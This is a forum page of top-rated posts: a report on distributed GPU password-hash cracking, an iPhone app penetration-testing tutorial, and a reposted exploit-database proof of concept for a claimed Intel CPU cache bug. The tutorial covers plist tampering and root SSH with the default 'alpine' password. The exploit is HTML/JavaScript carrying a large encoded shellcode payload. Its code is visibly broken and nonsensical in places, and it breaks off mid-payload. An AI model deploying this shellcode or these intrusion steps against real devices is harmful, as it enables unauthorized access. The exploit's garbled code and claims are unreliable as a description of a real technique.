Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 07/15/12 in all areas

  1. M2G
    It's a good day when you see the following on 10 hashes: Yes, that's 154B - as in Billion. It was done entirely with AMD hardware, and involved 9x6990, 4x6970, 4x5870, 2x5970, and 1x7990 - for a total of 31 GPU cores in 6 physical systems. We had another 11 cards with 15 GPU cores left over - we didn't have systems to put them in (mostly nVidia). For more details, read on... This morning, @jmgosney and I met up to work on the networking code for the new Multiforcer framework, and do some serious stress testing. I've been working on the networking code recently, and it needed some serious testing. I can do some testing in my development environment, but it usually takes going big to expose some types of bugs (which I most certainly did find). This is a good way to start a day: After putting all the GPUs we had into the systems we had (one board & one power supply were acting up and were unable to be used), this was the stack left over: The original plan was to use all the AMD cards, and fill in space with nVidia, but we unfortunately did not have enough room for all the AMD cards. Amusingly, one of my boards wouldn't find the hard drive controllers with 4 dual GPU cards installed. We also had a few remote systems that were helping out. There were supposed to be a few more, but they didn't pan out, so we were roughly 8 GPUs/12 cores short of where we were hoping to be. The server was an EC2 m1.small node, since I wanted to test the server at internet-scale latencies, and on a relatively low resource platform. We did not use any EC2 GPU nodes for this test, but may in the future... After a good bit of troubleshooting, code updates, and pushing binaries around, we finally hit success, as observed above. Also, as noted below. Please remember, these are NOT single hash speeds - these are on a list of 1000 hashes, over the internet... There are still a few improvements left to make, including some (surprise) threading issues & mutex issues. But other than a few edge cases, thing worked amazingly well! Also, there's no reason at all that nVidia cards couldn't have been helping. Even though they're slower, an nVidia GPU is still better than a CPU! If you want to play with this, it's currently in SVN. I'll be polishing off a few more bugs with the network code and then doing a release before Defcon. If you have more questions, you can also find me in my talk at Defcon - I will be presenting! Impresionant sau ce? Sursa
    1 point
  2. Wubi
    In the first part of this thread, we discussed the iPhone application traffic analysis. In this part, we will take a look at the privacy issues and the application local data storage. Privacy issues Every iPhone has an associated unique device Identifier derived from a set of hardware attributes called UDID. UDID is burned into the device and one cannot remove or change it. However, it can be spoofed with the help of tools like UDID Faker. UDID of the latest iPhone is computed with the formula given below - UDID = SHA1(Serial Number + ECID + LOWERCASE (WiFi Address) + LOWERCASE(Bluetooth Address)) UDID is exposed to application developers through an API which would allow them to access the UDID of an iPhone without requiring the device owner’s permission. The code snippet shown below is used to collect the UDID of a device, later which can used to track the user’s behavior. NSString *uniqueIdentifier = [device uniqueIdentifier] Current research shows that, with the help of UDID, it is possible to observe the user’s browsing patterns and trace out the user’s geo location. As it is possible to locate the user’s exact location with the help of a device UDID, it became a big privacy concern. More possible attacks are documented in Eric Smith-iPhone application privacy issues whitepaper. Eric’s research shows that 68% of applications silently send UDIDs to the servers on the internet. A perfect example of a serious privacy security breach is social gaming network Openfient. Openfient collected device UDID’s and misused them by linking it to real world user identities (like email address, geo locations latitude & longitude, Facebook profile picture) and making them available for public access, resulting in a serious privacy breach. More details about this security breach are documented at this link. While penetration testing, observe the network traffic for UDID transmission. UDID in the network traffic indicates that the application is collecting the device identifier or might be sending it to a third party analytic company to track the user’s behaviour. In iOS 5, Apple has deprecated the API that gives access to the UDID, and it will probably remove the API completely in future iOS releases. Development best practice is not to use the API that collects the device UDIDs, as it breaches the privacy of the user. If the developers want to keep track of the user’s behaviour, create a unique identifier specific to the application instead of using UDID. The disadvantage with the application specific identifier is that it only identifies an installation instance of the application, and it does not identify the device. Apart from UDID, applications may transmit personal identifiable information like age, name, address and location details to third party analytic companies. Transmitting personal identifiable information to third party companies without the user’s knowledge also violates the user’s privacy. So, during penetration testing carefully observe the network traffic for the transmission of any important data. Example: Pandora application was used to transmit user’s age and zip code to a third party analytic company (doubleclick.net) in clear text. For the applications which require the user’s geo location (ex: check-in services) to serve the content, it is always recommended to use the least degree of accuracy necessary. This can be achieved with the help of accuracy constants defined in core location framework (ex: CLLocationAccuracy kCLLocationAccuracyNearestTenMeters). Local data storage Mobile applications store the data locally on the device to maintain essential information across the application execution or for a better performance or offline access. Also, developers use the local device storage to store information such as user preferences and application configurations. As device theft is becoming an increasing concern, especially in the enterprise, insecure local storage is considered to be the top risk in mobile application threats. A recent survey conducted by Viaforensics revealed that 76 percent of mobile applications are storing user’s information on the device. 10 percent of them are even storing the plain text passwords on the phone. Sensitive information stored on the iPhone can be obtained by attackers in several ways. A few of the ways are listed below - From Backups When an iPhone is connected to iTunes, iTunes automatically takes a backup of everything on the device. Upon backup, sensitive files will also end up on the workstation. So an attacker who gets access to the workstation can read the sensitive information from the stored backup files. Physical access to the device People lose their phones and phones get stolen very easily. In both cases, an attacker will get physical access to the device and read the sensitive information stored on the phone. The passcode set to the device will not protect the information as it is possible to brute force the iPhone simple passcode within 20 minutes. To know more details about iPhone passcode bypass go through the iPhone Forensics article available at – InfoSec Resources – iPhone Forensics. Malware Leveraging a security weakness in iOS may allow an attacker to design a malware which can steal the files on the iPhone remotely. Practical attacks are demonstrated by Eric Monti in his presentation on iPhone Rootkit? There’s an App for That! . iPhone application directory structure: In iOS, applications are treated as a bundle represented within a directory. The bundle groups all the application resources, binaries and other related files into a directory. In iPhone, applications are executed within a jailed environment (sandbox or seatbelt) with mobile user privileges. Unlike Android UID based segregation, iOS applications runs as one user. Apple says “The sandbox is a set of fine-grained controls limiting an application’s access to files, preferences, network resources, hardware, and so on. Each application has access to the contents of its own sandbox but cannot access other applications’ sandboxes. When an application is first installed on a device, the system creates the application’s home directory, sets up some key subdirectories, and sets up the security privileges for the sandbox“. A sandbox is a restricted environment that prevents applications from accessing unauthorized resources; however, upon iPhone JailBreak, sandbox protection gets disabled. When an application is installed on the iPhone, it creates a directory with a unique identifier under /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. Typical iPhone application home directory structure is listed below. In iPhone, applications might store the information in any of the locations listed below. Plist files Keychain Application’s home directory Cache Logs Plist files: Property List is a structured binary formatted file which contains the essential configuration of a bundle executable in nested key value pairs. Plist files are used to store the user preferences and the configuration information of an application. For example, Gaming applications usually store game levels and game scores in the Plist files. In general, applications store the Plist files under [Application's Home Directory]/documents/preferences folder. Plist can either be in XML format or in binary format. As XML files are not the most efficient means of storage, most of the applications use binary formatted Plist files. Binary formatted data stored in the Plist files can be easily viewed or modified using Plist editors (ex: plutil). Plist editors convert the binary formatted data into an XML formatted data, later it can be edited easily. Plist files are primarily designed to store the user preferences & application configuration; however, the applications may use Plist files to store clear text usernames, passwords and session related information. So, while penetration testing, view all the Plist files available under application’s home directory and look for sensitive information, like usernames, passwords, user’s personal information and session cookies, etc… Developers can assign any extension to the Plist files. A Plist file can be easily identified by looking at the file contents using cat command. The content of a Plist file starts with bplist’. Along with the sensitive information storage, application may also take authentication & authorization decisions based on the values stored in Plist files. For example, if you notice a Plist entry like admin=0 during penetration testing, change the admin key value to 1 and open the application. If the application does not validate the user input properly and takes the authorization decision based on the Plist entry, you may log into the application as an administrator. Development best practice is to not store any sensitive information in Plist files. Also, do not take authentication & authorization decisions based on the information stored in Plist files. Plist files contain user controlled input, and it should be validated properly like any other user input. WordPress iPhone application used to store clear text username and password in a Plist file. The video below here demonstrates the WordPress vulnerability. This vulnerability was reported by SANS and WordPress fixed it immediately. Plist files can be viewed and modified easily on both the JailBroken and non JailBroken iPhones. The examples listed below illustrate the various ways of editing Plist files on the both JailBroken and non JailBroken devices. Tampering Plist files on a non JailBroken iPhone: On a non JailBroken iPhone, Plist files can be viewed & modified using tools like iExplorer and iBackupBot. Modifying Plist entries with iExplorer iExplorer (formerly iPhone Explorer) gives access to the iPhone in disk mode and allows browsing all the folders on the iPhone directly. Stick Cricket iPhone game is used for the demo. Stick Cricket iPhone game stores the game score in a Plist file under application’s home directory. As the application is storing the game score locally in a Plist file, it can be altered by editing the Plist file. Screenshot shown below displays the actual score before the Plist modification. Steps shown below will demonstrate the usage of iExplorer tool to modify the game scores stored in the Plist file - On your workstation download and install iExplorer. Connect the iPhone to the workstation over USB. In iExplorer, browse to Apps->com.sticksports.stickcricket folder. 4. Navigate to stick cricket Library->Preferences folder. 5. Copy com.sticksports.stickcricket.Plist file to the workstation by dragging it to the desktop. 6. On the workstation, open the Plist file using a Plist editor and modify the yourBest5Overs key value. For this demo, I have modified the value to 180 from 30 and saved the Plist file. 7. From iExplorer, delete the com.sticksports.stickcricket.Plist on the iPhone and drag the newly saved file onto the iPhone. 8. In iPhone, terminate the Stick Cricket application and reopen it. The Stick Cricket welcome screen now displays the modified score as shown in the screenshot below. Modifying Plist entries with iBackupBot When the iPhone is connected to a computer, iTunes takes a backup of everything on the phone including configuration files (Plist files). iBackupBot tool can be used to view and modify the Plist file entries on the iPhone backup and restore the modified backup onto the iPhone.. Steps shown below will demonstrate the use of iBackupBot tool to modify the game scores stored in the Plist file - Connect the iPhone to the workstation over USB cable. On Workstation, open iTunes and take a backup of the iPhone. Close iTunes. Open iBackupBot. It automatically identifies the existing backups and displays the files inside the backup to the user. Click on Stick Cricket and open /Library/Preferences/com.sticksports.stickcricket.Plist file. Modify the score stored in the Plist file. Click on Export icon to save the modified Plist file. Click the restore icon in iBackupBot toolbar. It will restore the iPhone with the modified backup. Now on iPhone, reopening the Stick Cricket game will display the modified score. Tampering Plist files on a JailBroken iPhone: On a JailBroken iPhone, Plist files can be viewed & modified using tools like plutil and iFile. Both these tools can be downloaded from Cydia (packages – com.eric.tool & iFile). iFile would allow to modify the Plist files directly on the iPhone. The iPhone camera application is used for the demo. In iOS camera application, Apple has hidden the panorama mode feature and planned to include this feature in future iOS versions. Panorama mode basically allows the users to take continuous photos while panning the camera from left to right. Apple stored the panorama mode switch in a Plist file. iOS hackers Conard & Chpwn exposed the panorama mode in iOS 5 by modifying an entry in com.apple.mobileslideshow.Plist file. Screenshot shown below displays the list of options available in the iPhone camera application. Steps shown below will demonstrate the usage of plutil tool to change the panorama switch stored in the Plist file - SSH to the iPhone and login as a root user (password: alpine). Navigate to /private/var/mobile/Library/Preferences/ directory. View com.apple.mobileslideshow.Plist file content with the help of plutil tool. > Plutil [I]com.apple.mobileslideshow.plist[/I] Add ‘EnableFirebreak’ key to the com.apple.mobileslideshow.plist file with the below command. > Plutil –key EnableFirebreak –value yes com.apple.mobileslideshow.plist It turns on the panorama feature in the iPhone camera application. Screenshot below shows different options available in the iPhone camera after the modification- Penetration Testing for iPhone Applications is going to be covered in a series of articles. Part 3 will cover the keychain data storage and error log analysis. References InfoSec Resources
    1 point
  3. ionut97
    <!-- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm S4(uR4 member from r00tw0rm team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ''' # # Name : Intel Core2Duo cpu cache controller bug PoC # Date : july, 14 2012 # Author : S4(uR4 # Platform : all # Type : remote exploit # Web : www.r00tw0rm.com # Email : satsura@r00tw0rm.com # Credit and special thanx : Selena, nezumi # Tested on : Intel Core 2 Duo T5750, Intel Atom N270 # Special thanks to : r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com) # Xenu, Versus71, alsa7r, mich4th3c0wb0y, FInnH@X, th3breacher, s3rver.exe (r00tw0rm.com) --> <html> <head> <title> CPU cache controller bug exploit (Remote code exec mod poc)</title> </head> </html> <body> <script type="text/javascript"> var microcode = 257; var N_CORE = 4; var XXL = 9*1024*1024; var buf = 9437185; var p = {}; var bug; var result; var n = {}; function init_c(){}; function engine(p, n){}; function test(result){ // debug: testing micro-program for the old vm, does not work now // latter comment 1: oh. my! it works! wow! // latter comment 2: it works, but it does not what it's expected to // dw buf[]={1,-3,0, -6,9,1, 13,-67,2, -69,96,3, 1,-1,4, // -3,3,5, 16,-27,6, -66,99,7, 55,-1,8, -1,-3,9, 0,-67,10}; // the infinite loop will be patched on the fly because of the Intel CPU bug // addr of the test() func should be aligned by 4Kb boundary, // 1st dword will be changed to NOP, NOP, NOP, NOP // it's possible to change the kernel memory as well, // two things: // 1) alignment; // 2) the code is currently executed; // // engine() obtains the address of test(), but does not check it, // so if you replace it, you have to check the conditionals above by yourself. // also the content to overwrite. if you want to change data memory // it's supposed to be in the cache as well. /* ASM: .text .globl main .type main, @function L1: xorl %ecx, %ecx main: pushl %ebp movl %esp, %ebp popl %ebp loop L1 ret .size main, .-main DISASM: 080483b4 <L1>: 80483b4: 31 c9 xor %ecx,%ecx 080483b6 <main>: 80483b6: 55 push %ebp 80483b7: 89 e5 mov %esp,%ebp 80483b9: 5d pop %ebp 80483ba: e2 f8 loop 80483b4 <L1> 80483bc: c3 ret 80483bd: 90 nop 80483be: 90 nop 80483bf: 90 nop */ unescape('%u31C9%u5589%uE55D%u2EF8%uC390%u9090'); return 0; } function ThreadProc(lpParameter){ engine(buf, microcode*3); return(0); } function ThreadProc_dbg(bug){ var result = 1; test(result); if (result != 1){ document.write("<h1>[+] your CPU is buggy!<h1>"); } else{ document.write("<h1>[-] your CPU isn't buggy!<h1>"); //eueeuereturn(0); } } function microcode_vm(){ var evilcode = "6B70%u6E63%u2066%u6F72%u204A%u442E%u2066%u6F72%u2049%u6E74"+ "%u656C%u2043%u6F72%u6520%u3220%u4475%u6F20%u5435%u3735%u300D%u0A28%u6329"+ "%u2053%u656C%u656E%u612F%u2F32%u3030%u372C%u2032%u3030%u3800%u2B00%u0000"+ "%u0500%u0000%u2600%u0000%u3E00%u0000%u4702%u0000%uE7FD%uFFFF%u0000%u0000"+ "%uA3FF%uFFFF%uA7FF%uFFFF%u0100%u0000%u0200%u0000%u0A00%u0000%u0200%u0000"+ "%u0100%u0000%u0900%u0000%u0300%u0000%u0400%u0000%u1400%u0000%u0400%u0000"+ "%u1F00%u0000%u2B00%u0000%u0500%u0000%u2600%u0000%u3E00%u0000%u0600%u0000"+ "%u0D00%u0000%u2500%u0000%u0700%u0000%u3000%u0000%u4000%u0000%u0800%u0000"+ "%u6B00%u0000%u8F00%u0000%u0900%u0000%uFA00%u0000%u1201%u0000%u0A00%u0000"+ "%uC901%u0000%uE101%u0000%u0B00%u0000%u0C00%u0000%u3C00%u0000%u0C00%u0000"+ "%u1700%u0000%u3300%u0000%u0D00%u0000%u0E00%u0000%u3600%u0000%u0E00%u0000"+ "%u1500%u0000%u4D00%u0000%u0F00%u0000%u6800%u0000%u8800%u0000%u1000%u0000"+ "%uD300%u0000%u1701%u0000%u1100%u0000%uF201%u0000%u3A02%u0000%u1200%u0000"+ "%uF103%u0000%u3904%u0000%u1300%u0000%uF407%u0000%u2408%u0000%u1400%u0000"+ "%uEF0F%u0000%u3B10%u0000%u1500%u0000%u961F%u0000%uCE1F%u0000%u1600%u0000"+ "%u1D00%u0000%u7500%u0000%u1700%u0000%u2000%u0000%u7000%u0000%u1800%u0000"+ "%u1B00%u0000%u7F00%u0000%u1900%u0000%u2A00%u0000%u6200%u0000%u1A00%u0000"+ "%u1900%u0000%u7100%u0000%u1B00%u0000%u3C00%u0000%u8C00%u0000%u1C00%u0000"+ "%uE700%u0000%u2301%u0000%u1D00%u0000%u9E01%u0000%uE601%u0000%u1E00%u0000"+ "%u2500%u0000%u9D00%u0000%u1F00%u0000%uD800%u0000%u1801%u0000%u2000%u0000"+ "%uA301%u0000%u2702%u0000%u2100%u0000%uE203%u0000%u6A04%u0000%u2200%u0000"+ "%uE107%u0000%u6908%u0000%u2300%u0000%uE40F%u0000%u7410%u0000%u2400%u0000"+ "%uFF1F%u0000%u4B20%u0000%u2500%u0000%uC63F%u0000%u1E40%u0000%u2600%u0000"+ "%uAD7F%u0000%u0580%u0000%u2700%u0000%uD0FF%u0000%u6000%u0100%u2800%u0000"+ "%uCBFF%u0100%u6F00%u0200%u2900%u0000%uDAFF%u0300%u7200%u0400%u2A00%u0000"+ "%u29FF%u0700%u81FF%u0700%u2B00%u0000%u2C00%u0000%u9C00%u0000%u2C00%u0000"+ "%u3700%u0000%u9300%u0000%u2D00%u0000%u2E00%u0000%u9600%u0000%u2E00%u0000"+ "%u3500%u0000%uED00%u0000%u2F00%u0000%u4800%u0000%uE800%u0000%u3000%u0000"+ "%u3300%u0000%uF700%u0000%u3100%u0000%u5200%u0000%uDA00%u0000%u3200%u0000"+ "%u1100%u0000%u9900%u0000%u3300%u0000%u1400%u0000%u8400%u0000%u3400%u0000"+ "%u0F00%u0000%u9B00%u0000%u3500%u0000%u3600%u0000%uEE00%u0000%u3600%u0000"+ "%u7D00%u0000%u1501%u0000%u3700%u0000%uC001%u0000%u5002%u0000%u3800%u0000"+ "%u3B03%u0000%uDF03%u0000%u3900%u0000%u4A00%u0000%uC200%u0000%u3A00%u0000"+ "%u3900%u0000%uD100%u0000%u3B00%u0000%u5C00%u0000%u2C01%u0000%u3C00%u0000"+ "%uC701%u0000%u4302%u0000%u3D00%u0000%u3E03%u0000%uC603%u0000%u3E00%u0000"+ "%u4500%u0000%u3D01%u0000%u3F00%u0000%uB801%u0000%u3802%u0000%u4000%u0000"+ "%u4303%u0000%u4704%u0000%u4100%u0000%uC207%u0000%uCA08%u0000%u4200%u0000"+ "%uC10F%u0000%uC910%u0000%u4300%u0000%uC41F%u0000%uD420%u0000%u4400%u0000"+ "%uDF3F%u0000%uEB40%u0000%u4500%u0000%uE67F%u0000%uFE80%u0000%u4600%u0000"+ "%uCDFF%u0000%uE500%u0100%u4700%u0000%uF0FF%u0100%u8000%u0200%u4800%u0000"+ "%uABFF%u0300%uCF00%u0400%u4900%u0000%uBAFF%u0700%uD200%u0800%u4A00%u0000"+ "%u89FF%u0F00%u2100%u1000%u4B00%u0000%u4CFF%u1F00%u7C00%u2000%u4C00%u0000"+ "%uD7FF%u3F00%uF300%u4000%u4D00%u0000%uCEFF%u7F00%uF600%u8000%u4E00%u0000"+ "%uD5FF%uFF00%u8D00%u0001%u4F00%u0000%uA8FF%uFF01%uC800%u0002%u5000%u0000"+ "%u93FF%uFF03%uD700%u0004%u5100%u0000%uB2FF%uFF07%uFA00%u0008%u5200%u0000"+ "%uB1FF%uFF0F%uF900%u0010%u5300%u0000%uB4FF%uFF1F%uE400%u0020%u5400%u0000"+ "%uAFFF%uFF3F%uFB00%u0040%u5500%u0000%u56FE%uFF7F%u0EFF%uFF7F%u5600%u0000"+ "%u5D00%u0000%u3501%u0000%u5700%u0000%u6000%u0000%u3001%u0000%u5800%u0000"+ "%u5B00%u0000%u3F01%u0000%u5900%u0000%u6A00%u0000%u2201%u0000%u5A00%u0000"+ "%u5900%u0000%u3101%u0000%u5B00%u0000%u7C00%u0000%uCC01%u0000%u5C00%u0000"+ "%uA700%u0000%uE301%u0000%u5D00%u0000%u5E00%u0000%u2601%u0000%u5E00%u0000"+ "%u6500%u0000%uDD01%u0000%u5F00%u0000%u9800%u0000%uD801%u0000%u6000%u0000"+ "%u6300%u0000%uE701%u0000%u6100%u0000%uA200%u0000%uAA01%u0000%u6200%u0000"+ "%u2100%u0000%u2901%u0000%u6300%u0000%u2400%u0000%u3401%u0000%u6400%u0000"+ "%u3F00%u0000%u0B01%u0000%u6500%u0000%u0600%u0000%u5E01%u0000%u6600%u0000"+ "%u6D00%u0000%uC501%u0000%u6700%u0000%u9000%u0000%uA001%u0000%u6800%u0000"+ "%u0B00%u0000%u2F01%u0000%u6900%u0000%u1A00%u0000%u3201%u0000%u6A00%u0000"+ "%u6900%u0000%uC101%u0000%u6B00%u0000%uEC00%u0000%u5C02%u0000%u6C00%u0000"+ "%uF703%u0000%u5305%u0000%u6D00%u0000%uEE07%u0000%u5609%u0000%u6E00%u0000"+ "%uF50F%u0000%u2D11%u0000%u6F00%u0000%u881F%u0000%uA820%u0000%u7000%u0000"+ "%u733E%u0000%uB73F%u0000%u7100%u0000%u9200%u0000%u9A01%u0000%u7200%u0000"+ "%u5100%u0000%uD901%u0000%u7300%u0000%uD400%u0000%u4402%u0000%u7400%u0000"+ "%uCF03%u0000%u5B05%u0000%u7500%u0000%uF607%u0000%u2E09%u0000%u7600%u0000"+ "%uBD0F%u0000%u5511%u0000%u7700%u0000%u801F%u0000%u9020%u0000%u7800%u0000"+ "%u7B3E%u0000%u9F3F%u0000%u7900%u0000%u8A00%u0000%u8201%u0000%u7A00%u0000"+ "%u7900%u0000%u9101%u0000%u7B00%u0000%u9C00%u0000%u6C02%u0000%u7C00%u0000"+ "%u8703%u0000%u8304%u0000%u7D00%u0000%u7E06%u0000%u8607%u0000%u7E00%u0000"+ "%u8500%u0000%u7D02%u0000%u7F00%u0000%u7803%u0000%u7804%u0000%u8000%u0000"+ "%u8306%u0000%u8708%u0000%u8100%u0000%u820F%u0000%u8A11%u0000%u8200%u0000"+ "%u811F%u0000%u8921%u0000%u8300%u0000%u843F%u0000%u9441%u0000%u8400%u0000"+ "%u9F7F%u0000%uAB81%u0000%u8500%u0000%uA6FF%u0000%uBE01%u0100%u8600%u0000"+ "%u8DFF%u0100%uA501%u0200%u8700%u0000%uB0FF%u0300%uC001%u0400%u8800%u0000"+ "%uEBFF%u0700%u0F01%u0800%u8900%u0000%u7AFF%u0F00%u9201%u1000%u8A00%u0000"+ "%u49FF%u1F00%u6100%u2000%u8B00%u0000%u8CFE%u3F00%uBC00%u4000%u8C00%u0000"+ "%u97FF%u7F00%uB301%u8000%u8D00%u0000%u8EFF%uFF00%uB601%u0001%u8E00%u0000"+ "%u95FF%uFF01%uCD01%u0002%u8F00%u0000%uE8FF%uFF03%u0801%u0004%u9000%u0000"+ "%u53FF%uFF07%u9701%u0008%u9100%u0000%u72FF%uFF0F%uBA01%u0010%u9200%u0000"+ "%u71FF%uFF1F%uB901%u0020%u9300%u0000%u74FF%uFF3F%uA401%u0040%u9400%u0000"+ "%u6FFF%uFF7F%uBB01%u0080%u9500%u0000%u16FF%uFFFF%u4E00%u0000%u9600%u0000"+ "%u9DFE%uFFFF%uF500%u0000%u9700%u0000%uA0FF%uFFFF%uF001%u0000%u9800%u0000"+ "%u9BFF%uFFFF%uFF01%u0000%u9900%u0000%uAAFF%uFFFF%uE201%u0000%u9A00%u0000"+ "%u99FF%uFFFF%uF101%u0000%u9B00%u0000%uBCFF%uFFFF%u0C01%u0000%u9C00%u0000"+ "%u67FF%uFFFF%uA301%u0000%u9D00%u0000%u1EFF%uFFFF%u6600%u0000%u9E00%u0000"+ "%uA5FE%uFFFF%u1D00%u0000%u9F00%u0000%u58FF%uFFFF%u9801%u0000%uA000%u0000"+ "%u23FF%uFFFF%uA701%u0000%uA100%u0000%u62FF%uFFFF%uEA01%u0000%uA200%u0000"+ "%u61FF%uFFFF%uE901%u0000%uA300%u0000%u64FF%uFFFF%uF401%u0000%uA400%u0000"+ "%u7FFF%uFFFF%uCB01%u0000%uA500%u0000%u46FF%uFFFF%u9E01%u0000%uA600%u0000"+ "%u2DFF%uFFFF%u8501%u0000%uA700%u0000%u50FF%uFFFF%uE001%u0000%uA800%u0000"+ "%u4BFF%uFFFF%uEF01%u0000%uA900%u0000%u5AFF%uFFFF%uF201%u0000%uAA00%u0000"+ "%uA9FC%uFFFF%u01FE%uFFFF%uAB00%u0000%uAC00%u0000%u1C02%u0000%uAC00%u0000"+ "%uB700%u0000%u1302%u0000%uAD00%u0000%uAE00%u0000%u1602%u0000%uAE00%u0000"+ "%uB500%u0000%u6D02%u0000%uAF00%u0000%uC800%u0000%u6802%u0000%uB000%u0000"+ "%uB300%u0000%u7702%u0000%uB100%u0000%uD200%u0000%u5A02%u0000%uB200%u0000"+ "%u9100%u0000%u1902%u0000%uB300%u0000%u9400%u0000%u0402%u0000%uB400%u0000"+ "%u8F00%u0000%u1B02%u0000%uB500%u0000%uB600%u0000%u6E02%u0000%uB600%u0000"+ "%uFD00%u0000%u9503%u0000%uB700%u0000%u4001%u0000%uD003%u0000%uB800%u0000"+ "%uBB00%u0000%u5F02%u0000%uB900%u0000%uCA00%u0000%u4202%u0000%uBA00%u0000"+ "%uB900%u0000%u5102%u0000%uBB00%u0000%uDC00%u0000%uAC03%u0000%uBC00%u0000"+ "%u4701%u0000%uC303%u0000%uBD00%u0000%uBE00%u0000%u4602%u0000%uBE00%u0000"+ "%uC500%u0000%uBD03%u0000%uBF00%u0000%u3801%u0000%uB803%u0000%uC000%u0000"+ "%uC300%u0000%uC703%u0000%uC100%u0000%u4201%u0000%u4A03%u0000%uC200%u0000"+ "%u4100%u0000%u4902%u0000%uC300%u0000%u4400%u0000%u5402%u0000%uC400%u0000"+ "%u5F00%u0000%u6B02%u0000%uC500%u0000%u6600%u0000%u7E02%u0000%uC600%u0000"+ "%u4D00%u0000%u6502%u0000%uC700%u0000%u7000%u0000%u0002%u0000%uC800%u0000"+ "%u2B00%u0000%u4F02%u0000%uC900%u0000%u3A00%u0000%u5202%u0000%uCA00%u0000"+ "%u0900%u0000%uA102%u0000%uCB00%u0000%uCC00%u0000%uFC03%u0000%uCC00%u0000"+ "%u5701%u0000%u7303%u0000%uCD00%u0000%u4E00%u0000%u7602%u0000%uCE00%u0000"+ "%u5500%u0000%u0D02%u0000%uCF00%u0000%u2800%u0000%u4802%u0000%uD000%u0000"+ "%u1300%u0000%u5702%u0000%uD100%u0000%u3200%u0000%u7A02%u0000%uD200%u0000"+ "%u3100%u0000%u7902%u0000%uD300%u0000%u3400%u0000%u6402%u0000%uD400%u0000"+ "%u2F00%u0000%u7B02%u0000%uD500%u0000%uD600%u0000%u8E03%u0000%uD600%u0000"+ "%uDD01%u0000%uB504%u0000%uD700%u0000%uE007%u0000%uB00A%u0000%uD800%u0000"+ "%uDB0F%u0000%uBF12%u0000%uD900%u0000%uEA1F%u0000%uA222%u0000%uDA00%u0000"+ "%uD93F%u0000%uB142%u0000%uDB00%u0000%uFC7F%u0000%u4C82%u0000%uDC00%u0000"+ "%u27FF%u0000%u6301%u0100%uDD00%u0000%uDEFC%u0100%uA6FF%u0100%uDE00%u0000"+ "%uE501%u0000%u5D04%u0000%uDF00%u0000%u1807%u0000%u5809%u0000%uE000%u0000"+ "%uE30C%u0000%u670F%u0000%uE100%u0000%u2201%u0000%u2A03%u0000%uE200%u0000"+ "%uA100%u0000%uA903%u0000%uE300%u0000%uA401%u0000%uB404%u0000%uE400%u0000"+ "%uBF07%u0000%u8B0A%u0000%uE500%u0000%u860F%u0000%uDE12%u0000%uE600%u0000"+ "%uED1F%u0000%u4522%u0000%uE700%u0000%u103F%u0000%u2041%u0000%uE800%u0000"+ "%u8B7C%u0000%uAF7F%u0000%uE900%u0000%u9A01%u0000%uB204%u0000%uEA00%u0000"+ "%uE907%u0000%u410A%u0000%uEB00%u0000%u6C0F%u0000%uDC12%u0000%uEC00%u0000"+ "%u771F%u0000%uD322%u0000%uED00%u0000%u6E3F%u0000%uD642%u0000%uEE00%u0000"+ "%u757F%u0000%uAD82%u0000%uEF00%u0000%u08FF%u0000%u2801%u0100%uF000%u0000"+ "%uF3FC%u0100%u37FF%u0100%uF100%u0000%u1201%u0000%u1A03%u0000%uF200%u0000"+ "%uD100%u0000%u5903%u0000%uF300%u0000%u5401%u0000%uC404%u0000%uF400%u0000"+ "%u4F07%u0000%uDB0A%u0000%uF500%u0000%u760F%u0000%uAE12%u0000%uF600%u0000"+ "%u3D1F%u0000%uD522%u0000%uF700%u0000%u003F%u0000%u1041%u0000%uF800%u0000"+ "%uFB7C%u0000%u1F7F%u0000%uF900%u0000%u0A01%u0000%u0203%u0000%uFA00%u0000"+ "%uF900%u0000%u1103%u0000%uFB00%u0000%u1C01%u0000%uEC04%u0000%uFC00%u0000"+ "%u0707%u0000%u0309%u0000%uFD00%u0000%uFE0C%u0000%u060F%u0000%uFE00%u0000"+ "%u0501%u0000%uFD04%u0000%uFF00%u0000%uF806%u0000%uF808%u0000%u0001%u0000"; unescape(evilcode); } /* // THREATED IMPLEMENTATION function init(){ document.write("<p>[!] Exploit Running</p><br>"); document.write("[+] Loading micro-program"); microcode_vm(); var a, id, handle; var size = 111; document.write("initializing XX thread..."); for (a=1; a < N_CORE; a++){ //code should be written for debug. } } */ function vm_engine() { var a, dw, f1, f2, f3, fn, f0 = -1, dt = 0; for({ microcode_vm(); f1; unescape = (p + ((dt++) % n)); f2 = (p + ((dt++) % n)); f3 = (p + ((dt++) % n)); // vm + scrambler + dynamic encoder + multi-pass obfuscator fn = -1 ^ (f1 ^ f2) + ((dt + f1) ^ f2) ^ f0; // a few minutes to trigger this condition on 2.4 MHz PC if ( ((f1 ^ f2) == 0) || (f1 ^ f2 ^ f3) == 0) { // a sync problem. it would be better to use locks over here. // crash happens. crash is not shit. crash means code works. // so, should be really care about the addr and the content? // it works for Intel Core 2 Duo T5750. o_o 5 ~ 10 minutes of // it gives BSOD on Intel Atom N270 cpu o_o less than an hour f3 = test(result); f1 = unescape("%u9090%u9090") ^ f0 + // Shellcode Calculator unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"+ "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + 